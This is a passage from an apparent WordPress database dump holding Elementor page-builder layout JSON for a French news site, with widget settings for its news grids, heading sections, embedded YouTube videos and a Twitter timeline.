"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2424,775,'_elementor_version','0.4'),(2425,775,'_elementor_css','a:3:{s:4:\"time\";i:1509430524;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2426,776,'_elementor_edit_mode','builder'),(2427,776,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_ic